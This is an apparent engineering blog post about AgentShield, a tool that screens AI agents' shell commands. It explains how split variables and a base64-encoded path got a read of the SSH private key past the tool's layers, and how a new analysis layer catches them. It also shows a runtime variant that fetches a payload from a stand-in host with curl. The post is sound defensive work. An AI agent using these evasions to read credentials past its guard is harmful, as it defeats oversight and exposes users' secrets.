A real bypass, a new analyzer layer, and the design pattern behind it.
The bypass
A few days ago, AgentShield was beaten by these three lines of bash:
P1=~/.ssh
P2=id_rsa
cat $P1/$P2
Twelve meaningful characters. No exotic encoding, no novel shell trick. A junior engineer on a tight deadline writes this code by accident every other week.
And it walked past every layer of the analyzer pipeline I described in The 6 Layers Between Your AI Agent and rm -rf /.
What each layer missed
The literal SSH key path never appears as a token. The regex layer cannot see it. The structural layer's argument list is [cat, $P1, $P2] — none match a protected-path glob. The semantic layer recognizes the intent (read a file via cat) but has no path to check. Dataflow tracks source-to-sink chains, but the chain is not reaching a sink it cares about. Stateful is for compound commands. Guardian smells obfuscation, but two literal assignments and a concatenation are not obfuscation by any normal definition.
Six layers. Zero hits.
Layer 2.5
So we added a new layer between Structural and Semantic. I have taken to calling it Layer 2.5.
Its only job is to enrich the analysis context with materialized argument values. It re-parses the command, builds a symbol table from constant assignments, walks every call argument and re-resolves it, and appends the results to a new field on the context. The engine's existing protected-path check then runs against that field after the pipeline finishes.
Decisions stay where they were. Layer 2.5 is pure enrichment. One source of truth for path policy, one new thing producing inputs for it.
Why a new layer
The structural layer already walks the AST, but it reads from a flattened command view that drops assignments by design. Adding bash-variable substitution there meant rewriting that view or stapling a side channel onto it.
Dataflow already does taint propagation, but its job is source-to-sink. What we needed was not taint but materialization: produce the strings the command resolves to under static-only assumptions. That is a pure transformation, not a security decision. Mixing it into Dataflow would blur two responsibilities that have stayed cleanly separated for a reason.
A new layer was the cleanest home.
The second bypass
The same engineer sent a second one three days later:
cat $(echo fi8uc3NoL2lkX3JzYQ== | base64 -d)
Decode that base64 and you get the same SSH key path. The shell never sees it until runtime.
Different attack, same property: the protected path exists in the source code, one transformation away from being readable. Same layer was the right home, with one extension. We added a constant-decoder folder for command substitutions of the form source | decoder, where the source is a constant echo or printf of a literal and the decoder is on a tight whitelist.
var recognizedDecoders = map[string]decodeFunc{
"base64": decodeBase64, // -d, --decode, -D
"xxd": decodeHex, // -r -p
}
That is the entire whitelist. tr, rev, and printf '\xNN' are deferred. Every wrong fold turns into a false BLOCK that breaks legitimate scripts. The discipline is to add a decoder only when an attack surfaces using it.
The runtime variant
There is a third shape neither patch handles, and should not:
cat $(curl evil.example.com/payload | base64 -d)
Same decoder pipeline, but the source is a network fetch. The decoded path is unknowable until execution. If you tried to guess the result, you would be writing a malware sandbox in a few hundred lines of Go and shipping silent false BLOCKs as a bonus.
The right move is to refuse to guess and route the shape to a different detector. Inside the Guardian heuristic layer, a rule called obfuscated_decoder_eval watches for exactly this pattern — a file-reader argument whose source is a decoder pipeline with a non-constant input — and raises AUDIT, not BLOCK.
Substitution handles constant decoder pipelines and lets the protected-path policy decide. Guardian handles non-constant ones on shape alone, no path resolution attempted. Both share their decoder definition through a single exported function, so adding a new decoder updates both.
Deterministic plus heuristic compose
This is the design pattern I keep coming back to in other contexts.
The deterministic layer resolves what it can prove from static information. Returns a fact. Lets policy act normally.
The heuristic layer detects the shape of attacks the deterministic layer cannot resolve. Returns a smell. Audits but never blocks.
When the next bypass report comes in — and they will — the question becomes: what part of this can I prove statically, and what part can I only smell? Whichever component the answer maps to gets the new code.
The numbers
Across the existing 4,381-case accuracy suite plus the new bypass-pattern test cases: 100 percent precision, 99.8 percent recall. Zero false BLOCKs. Six known false negatives, all pre-existing.
The precision number is doing the most work. It says the discipline held — the narrow decoder whitelist, the bail-on-shape policy, the refusal to guess on indirect expansion.
What this is really about
The bypass is mundane. What is interesting is that the architecture had room for it.
When we wrote the six-layer post, the pipeline was a load-bearing claim. Each layer has a clear job. Responsibilities do not overlap. Adding new coverage means adding code in exactly one place. The Layer 2.5 patch was the first real test of that claim against a bypass that did not fit any existing layer. It slotted in cleanly.
The next obfuscation pattern that walks in will look different. It will share the same shape, though: a part you can prove and a part you can only smell. Whichever side the new evidence falls on, there is now a layer for it.
Try it
If you have found a bypass — whether it walked through six layers or one — file an issue on github.com/AI-AgentLens/AIAgentShield. The deterministic layer or the heuristic one will absorb it.
brew install ai-agentlens/tap/agentshield
agentshield setup claude-code
Loading comments...